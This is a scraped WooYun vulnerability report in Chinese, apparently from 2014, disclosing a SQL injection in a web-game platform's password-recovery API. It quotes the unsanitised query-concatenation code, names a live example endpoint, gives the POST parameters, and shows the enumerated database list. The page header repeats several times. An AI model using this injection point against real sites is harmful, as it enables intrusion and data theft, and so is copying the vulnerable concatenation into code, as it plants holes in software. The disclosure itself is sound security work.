信游科技页游平台通用型SQL注入一发 | wooyun-2014-048510| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048510

漏洞标题：信游科技页游平台通用型SQL注入一发

漏洞作者： wefgod

提交时间：2014-01-10 18:54

修复时间：2014-04-10 18:54

公开时间：2014-04-10 18:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-01-10：细节已通知厂商并且等待厂商处理中
2014-01-14：厂商已经确认，细节仅向厂商公开
2014-01-17：细节向第三方安全合作伙伴开放
2014-03-10：细节向核心白帽子及相关领域专家公开
2014-03-20：细节向普通白帽子公开
2014-03-30：细节向实习白帽子公开
2014-04-10：细节向公众公开

简要描述：

据说通用的，来看看。

详细说明：

不知道前面的大哥有提交了没有，下了免费版的来看。某个API存在注入的问题

漏洞证明：

Api/User/findpassword.ashx

var u_account = context.Request.Form["username"];
        var find_type = context.Request.Form["findtype"];
        var find_question = context.Request.Form["find_qus"];
        var find_answer = context.Request.Form["find_answer"];
        DataManage.UserEng ung = new DataManage.UserEng();
        var _user_ = ung.GetItem(u_account);

u_account参数未过滤（就是username），直接带入到了ung.GetItem中：
        public Apw_User GetItem(string account)
        {
            return this.dataserver.GetAll<Apw_User>("select * from Apw_User where u_Account='" + account.Trim() + "'").FirstOrDefault<Apw_User>();
        }

拼接的字符串导致了POST+字符型注入的产生：
以 http://www.12wan.com/api/user/findpassword.ashx 为例（因为官方的站点我好像没找到用这个的……测试站也不知道是哪个）
POST数据：
posttype=find_pwd1&username=a&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=

获取到数据库：
available databases [10]
[*] bbs
[*] cd2
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] v32
[*] xy003
其它就不深入了

修复方案：

过滤参数。

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2014-01-14 11:51

厂商回复：

已经认领这个系统是老版本系统公开前会被淘汰但是非常感激提出漏洞的白帽子们已经联系乌云官方准备做次活动具体请留意官方公告再次感谢礼物已送

漏洞评价：

2014-01-10 19:02 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

走小厂商了？ WooYun: 信游科技页游平台程序通用型SQL注入漏洞这哥们的好像还漏洞预警了啊 @疯狗 @xsser
2014-01-10 20:03 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@wefgod 是通用咩 @Finger
2014-01-10 22:51 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@xsser 是啊，有官方案例，另外那个文件上传的里面写有官方给的案例链接
2014-01-10 23:46 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@信游科技页游 WooYun: 信游科技页游平台程序通用型文件上传，可攻陷多个主流网页游戏平台厂商也关注下另外这个吧
2014-01-13 17:38 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

咋不见厂商了？上周不是还挺积极的

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048510

漏洞标题：信游科技页游平台通用型SQL注入一发

相关厂商：52xinyou.cn

漏洞作者： wefgod

提交时间：2014-01-10 18:54

修复时间：2014-04-10 18:54

公开时间：2014-04-10 18:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048510

漏洞标题：信游科技页游平台通用型SQL注入一发

相关厂商：52xinyou.cn

漏洞作者： wefgod

提交时间：2014-01-10 18:54

修复时间：2014-04-10 18:54

公开时间：2014-04-10 18:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-048510"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：